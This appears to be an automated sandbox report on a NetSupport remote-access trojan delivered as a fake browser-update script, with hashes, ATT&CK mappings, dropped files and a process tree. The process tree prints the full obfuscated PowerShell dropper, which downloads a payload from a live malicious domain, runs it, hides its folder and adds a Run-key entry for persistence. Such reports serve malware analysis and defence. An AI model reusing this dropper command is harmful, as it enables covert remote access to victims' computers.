netsupport | f69fc48e63d4a52deea5efe6e6e5f3d2dc1fd0494d7969d7a2f48639e0cea4ff

Analysis

max time kernel
146s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20231130-en
resource tags

arch:x64arch:x86image:win10v2004-20231130-enlocale:en-usos:windows10-2004-x64system
submitted
13/12/2023, 21:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup/Update_browser_17.645330.js
Size

297KB
MD5

c07b9f4286c498b1ad0128a1ce7d8296
SHA1

56a74f9b9f737092c80d90d667ad2fdd2cbf6e98
SHA256

e697a507229b457a3580674b104eb426c69aa77db3873fa593dbc6f5ff37cd05
SHA512

f1b57f9a3538430e2342d9f6884214fa7dff0d03e2cd78375f0f1e92752ce06c5b4295998e888a4c45fef4df0e2ea1b320c98bbb41d9cd3f4085b65686b69611
SSDEEP

3072:4OpyDJu8XUtQQSO1T7cbF/nlz3wq2BCaOpyDJu8XUtQQSO1T7cbF/nlz3wq2Bp:lcJ6QhO1T7cZd6B0cJ6QhO1T7cZd6Bp

Score

10^/10

netsupport persistence rat

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://mindsnatchers.com/GetImageData.php?10925

exe.dropper

https://mindsnatchers.com/GetImageData.php?10925

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1620	wscript.exe
31	2016	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-423100829-2271632622-1028104103-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 1 IoCs

pid	Process
3208	client32.exe

Loads dropped DLL 5 IoCs

pid	Process
3208	client32.exe
3208	client32.exe
3208	client32.exe
3208	client32.exe
3208	client32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-423100829-2271632622-1028104103-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DIVXX = "C:\\Users\\Admin\\AppData\\Roaming\\DIVX-508\\client32.exe"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	5	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2016	powershell.exe
2016	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeSecurityPrivilege	3208	client32.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3208	client32.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 1620 wrote to memory of 2016	1620	wscript.exe	90
PID 1620 wrote to memory of 2016	1620	wscript.exe	90
PID 2016 wrote to memory of 3208	2016	powershell.exe	101
PID 2016 wrote to memory of 3208	2016	powershell.exe	101
PID 2016 wrote to memory of 3208	2016	powershell.exe	101

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Setup\Update_browser_17.645330.js
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $xhYHBCywYiVmnUYclQVactFAOrMk='https://mindsnatchers.com/GetImageData.php?10925';$fUFiNIovtfTAsNuJti=(New-Object System.Net.WebClient).DownloadString($xhYHBCywYiVmnUYclQVactFAOrMk);$bHcwYEqVvfTLONyffeBIWpjdAWIbcUeE=[System.Convert]::FromBase64String($fUFiNIovtfTAsNuJti);$zxc = Get-Random -Minimum -1000 -Maximum 1000; $fymdLQLHlLqFwPz=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $fymdLQLHlLqFwPz -PathType Container)) { New-Item -Path $fymdLQLHlLqFwPz -ItemType Directory };$p=Join-Path $fymdLQLHlLqFwPz 'rtr.zip';[System.IO.File]::WriteAllBytes($p,$bHcwYEqVvfTLONyffeBIWpjdAWIbcUeE);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$fymdLQLHlLqFwPz)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $fymdLQLHlLqFwPz 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$FSDFSSD=Get-Item $fymdLQLHlLqFwPz -Force; $FSDFSSD.attributes='Hidden';$s=$fymdLQLHlLqFwPz+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIVXX';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;
  2⤵
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2016
- - C:\Users\Admin\AppData\Roaming\DIVX-508\client32.exe
    "C:\Users\Admin\AppData\Roaming\DIVX-508\client32.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:3208

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ow2yguf.0dw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-508\HTCTL32.DLL

Filesize
84KB

MD5
ee2a55414934724057bf1cdf63100d71

SHA1
d59d911082c87938e3636be619da1ef7728e8313

SHA256
b65a4556545375077c68010e9e1b0c148badf963d6e4fde352de530aeb2ccac4

SHA512
f6d2b06d2bc868195ffc9ee3f994487196b554f499b484f8c4e43af245572cd3f8d1295189baccaee92c75362f36111b230e2de88fa845285320bcbf036815b8

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-508\HTCTL32.DLL

Filesize
47KB

MD5
2bcc4607aaf9098b992bb3bbc10f2c64

SHA1
3d99db6164484898b34f3928b0cdebb8436251e1

SHA256
05d2447d20d8da6ab85948395835f27da9af8750facbe62acd0a7a184e2db534

SHA512
00458fdb6ae1faa224ad6a7d5e1f596d2c1cb6463ec2766ca3b4f703d5532772b19d9fcc3db3523d422eebdcd8ce27044869afb6e10ceb61a2e743ffbf2e2441

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-508\MSVCR100.dll

Filesize
195KB

MD5
e5239a86b2c46774387798e0580f3444

SHA1
08edf620ba1dec06d7947306bf0744f93926d3a5

SHA256
9fb45c6d75165e67f274459ea48063d0c2326f82ed8b2da0afdd7e61bd38a748

SHA512
24a09eeda3ee2c5bce0b14f3984e7a47181a2894c66b62c4c175421419e60329c96adb27bb7c8682142d2d0c82ee0b53444a3e831d1b4722a7d3c55013329949

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-508\NSM.LIC

Filesize
258B

MD5
1b41e64c60ca9dfadeb063cd822ab089

SHA1
abfcd51bb120a7eae5bbd9a99624e4abe0c9139d

SHA256
f4e2f28169e0c88b2551b6f1d63f8ba513feb15beacc43a82f626b93d673f56d

SHA512
c97e0eabea62302a4cfef974ac309f3498505dd055ba74133ee2462e215b3ebc5c647e11bcbac1246b9f750b5d09240ca08a6b617a7007f2fa955f6b6dd7fee4

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-508\PCICHEK.DLL

Filesize
18KB

MD5
104b30fef04433a2d2fd1d5f99f179fe

SHA1
ecb08e224a2f2772d1e53675bedc4b2c50485a41

SHA256
956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

SHA512
5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-508\PCICL32.DLL

Filesize
414KB

MD5
71c6bcdd0394fbb7e0a2c0d5addbef21

SHA1
75ff0b235fdf81a7bf4a19cc998b123977d14e80

SHA256
b19b5b0735bf1b0f15b3c7f5b440bd3f171bc68ba6542cc5798e90b73fffadff

SHA512
7f05277da957138a7f078108863bd2250cd5f7dfe6d043982d3bd0522bcd03d8b6c978ac16d5331c1ad39c7e661b1a3d543673ee7a278f808c77442d143db87d

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-508\PCICL32.dll

Filesize
1.2MB

MD5
d1f3fa7256154da016c976eb09d57f4e

SHA1
12ecaed481dc9e6af894ef502e5556117dc408f0

SHA256
21062048374806cdb1f85fce0a5a88e451f4ad4f1502a36455cf581a0361e90e

SHA512
967dcb1ed767d71f1753514690ba35a88a2874acc291baf65322e34b76748ef5e76e6c5dbd2d50fc543015bd39ded816cbb8fcda3c0201862717a15211dacae2

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-508\client32.exe

Filesize
101KB

MD5
c4f1b50e3111d29774f7525039ff7086

SHA1
57539c95cba0986ec8df0fcdea433e7c71b724c6

SHA256
18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d

SHA512
005db65cedaaccc85525fb3cdab090054bb0bb9cc8c37f8210ec060f490c64945a682b5dd5d00a68ac2b8c58894b6e7d938acaa1130c1cc5667e206d38b942c5

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-508\client32.ini

Filesize
670B

MD5
b11f62b15f97cf5afb117e967c223882

SHA1
d6cc3f4c7cad5bf28d9c44bee2362b8edc69097b

SHA256
13fe71354608a9345d9d7c1600568ec911d718ece989442a39a5601e5fe35586

SHA512
85dbba7dcb1aa1015c186567b06ca2ae5a782a21b0b4008496fb831b39f27e5ee79c716e46aa07a9392fd3037aa1e7b4dbb47f217b1f0eb1c7fc9516d775cc7a

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-508\msvcr100.dll

Filesize
365KB

MD5
9d90880ef2ef786a6a95c82bda269e6d

SHA1
95f7f33a6c703a36423976a47cd836adf554b427

SHA256
f2c10fac9889926f76a832f41ca609260c6bb95bff907f4fff010fcf7b979d30

SHA512
71d5d7fb15a1b32ad155be6df4edbafaabdc3b77e9c4f13cfab0209454c34af35e8220057da0159fdfdcff01a4ca712029dbfa444ff162c8847c8842ccab9e8f

Download Submit
C:\Users\Admin\AppData\Roaming\DIVX-508\pcicapi.dll

Filesize
32KB

MD5
34dfb87e4200d852d1fb45dc48f93cfc

SHA1
35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641

SHA256
2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703

SHA512
f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

Download Submit
memory/2016-10-0x00007FFE20120000-0x00007FFE20BE1000-memory.dmp

Filesize
10.8MB

Download
memory/2016-15-0x000002A0BC9D0000-0x000002A0BC9E2000-memory.dmp

Filesize
72KB

Download
memory/2016-77-0x00007FFE20120000-0x00007FFE20BE1000-memory.dmp

Filesize
10.8MB

Download
memory/2016-14-0x000002A0BC840000-0x000002A0BC84A000-memory.dmp

Filesize
40KB

Download
memory/2016-4-0x000002A0BC500000-0x000002A0BC522000-memory.dmp

Filesize
136KB

Download
memory/2016-11-0x000002A0A22D0000-0x000002A0A22E0000-memory.dmp

Filesize
64KB

Download
memory/2016-12-0x000002A0A22D0000-0x000002A0A22E0000-memory.dmp

Filesize
64KB

Download